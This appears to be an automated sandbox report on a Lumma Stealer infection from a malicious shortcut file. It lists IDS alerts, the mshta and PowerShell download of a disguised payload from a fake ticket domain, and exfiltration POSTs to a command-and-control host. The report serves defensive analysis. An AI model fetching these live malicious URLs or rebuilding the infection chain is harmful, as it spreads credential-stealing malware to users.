2024-12-06T15:27:09.920489+0100	2028371	3	Unknown Traffic	192.168.2.5	49875	104.21.10.2	443	TCP
2024-12-06T15:27:13.765494+0100	2028371	3	Unknown Traffic	192.168.2.5	49884	104.21.10.2	443	TCP
2024-12-06T15:27:20.592956+0100	2028371	3	Unknown Traffic	192.168.2.5	49902	104.21.10.2	443	TCP
2024-12-06T15:27:26.431331+0100	2028371	3	Unknown Traffic	192.168.2.5	49915	104.21.10.2	443	TCP
2024-12-06T15:27:30.715791+0100	2028371	3	Unknown Traffic	192.168.2.5	49926	104.21.10.2	443	TCP
2024-12-06T15:27:34.898544+0100	2028371	3	Unknown Traffic	192.168.2.5	49937	104.21.10.2	443	TCP
2024-12-06T15:27:39.495203+0100	2028371	3	Unknown Traffic	192.168.2.5	49948	104.21.10.2	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T15:27:12.503814+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49875	104.21.10.2	443	TCP
2024-12-06T15:27:19.159696+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49884	104.21.10.2	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T15:27:12.503814+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49875	104.21.10.2	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T15:27:19.159696+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49884	104.21.10.2	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T15:27:37.949822+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49937	104.21.10.2	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for sample

Source: JSWunwO4rS.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 172.67.219.101:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.101:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49948 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Directory queried: number of queries: 1001

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_00406301 FindFirstFileW,FindClose,		9_2_00406301
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		9_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\136140	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\136140\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49875 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49884 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49884 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49875 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49937 -> 104.21.10.2:443

Source: global traffic

HTTP traffic detected: GET /IntroductoryTunes.exe HTTP/1.1Host: wserdtfyguhij.2024-vipticket.comConnection: Keep-Alive

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49875 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49884 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49902 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49948 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49926 -> 104.21.10.2:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49937 -> 104.21.10.2:443

Source: global traffic	HTTP traffic detected: GET /k.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: wserdtfyguhij.2024-vipticket.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bendydully.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: bendydully.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W188QEUGVZ7KJQ3JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12828Host: bendydully.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HVO8VUIUMYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: bendydully.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TBLNHN5ZLRX1BG6TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20560Host: bendydully.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4W6ISP1QD9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1198Host: bendydully.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1LY816FYPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 547638Host: bendydully.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /k.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: wserdtfyguhij.2024-vipticket.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /IntroductoryTunes.exe HTTP/1.1Host: wserdtfyguhij.2024-vipticket.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: wserdtfyguhij.2024-vipticket.com
Source: global traffic	DNS traffic detected: DNS query: mnzXUlzpaVuBYoehcauIn.mnzXUlzpaVuBYoehcauIn
Source: global traffic	DNS traffic detected: DNS query: bendydully.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bendydully.click

Source: powershell.exe, 00000007.00000002.2175697500.0000019832BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000007.00000002.2175697500.0000019832BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000007.00000002.2175697500.0000019832BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: IntroductoryTunes.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://line.naver.jp0
Source: powershell.exe, 00000007.00000002.2175697500.0000019834412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe, 00000009.00000000.2169554498.0000000000409000.00000002.00000001.01000000.0000000F.sdmp, IntroductoryTunes.exe, 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000007.00000002.2175697500.0000019834436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000007.00000002.2175697500.0000019832BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000007.00000002.2175697500.0000019832BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2086496736.000001DE93A2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2079166575.0000017180088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000007.00000002.2175697500.00000198343EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wserdtfyguhij.2024-vipticket.com
Source: powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Concerts.com, 00000013.00000000.2207209927.0000000000D19000.00000002.00000001.01000000.00000012.sdmp, Significantly.9.dr, Concerts.com.10.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.2086496736.000001DE939E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2086496736.000001DE939FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2079166575.000001718005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2079166575.0000017180049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2108378520.0000023434660000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2175697500.0000019833685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000005.00000003.2244892454.000001F4D58A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248903081.000001F4D58A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.6.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000002.00000002.2086496736.000001DE93EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket
Source: powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019834085000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com
Source: mshta.exe, 00000005.00000003.2238124041.000001F4D5891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/
Source: powershell.exe, 00000007.00000002.2175697500.0000019834085000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/IntroductoryT
Source: powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019834085000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/IntroductoryTunes.exep
Source: mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240187331.000001FCDC45F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2238124041.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2244892454.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2251538246.000001FCDCD10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4
Source: mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4#
Source: powershell.exe	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4$global:?
Source: powershell.exe, 00000004.00000002.2082048730.00000171ED550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4%
Source: mshta.exe, 00000005.00000002.2251538246.000001FCDCD10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4(
Source: mshta.exe, 00000005.00000003.2238526594.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242539578.000001FCD853F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250851801.000001FCD8540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4...
Source: mshta.exe, 00000005.00000002.2250550367.000001FCD84AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4...(J
Source: mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp475
Source: mshta.exe, 00000005.00000003.2239040824.000001FCD855F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250909549.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4C
Source: mshta.exe, 00000005.00000002.2248903081.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2238124041.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2244892454.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4C:
Source: mshta.exe, 00000005.00000002.2249280903.000001F4D5A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4Dri
Source: mshta.exe, 00000005.00000003.2238526594.000001FCD854E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2239040824.000001FCD855F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250909549.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2249202946.000001F4D5A50000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4H
Source: mshta.exe, 00000005.00000003.2240522066.000001F4D581D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4OOC:
Source: mshta.exe, 00000005.00000003.2244463928.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2238526594.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2244758933.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250799869.000001FCD8538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4ass
Source: mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4c
Source: mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4dows
Source: mshta.exe, 00000005.00000003.2237861906.000001FCDC45B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4e
Source: mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2246280426.000001FCDC5D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4
Source: mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4)
Source: mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4https://
Source: mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4xqbfn
Source: mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4j
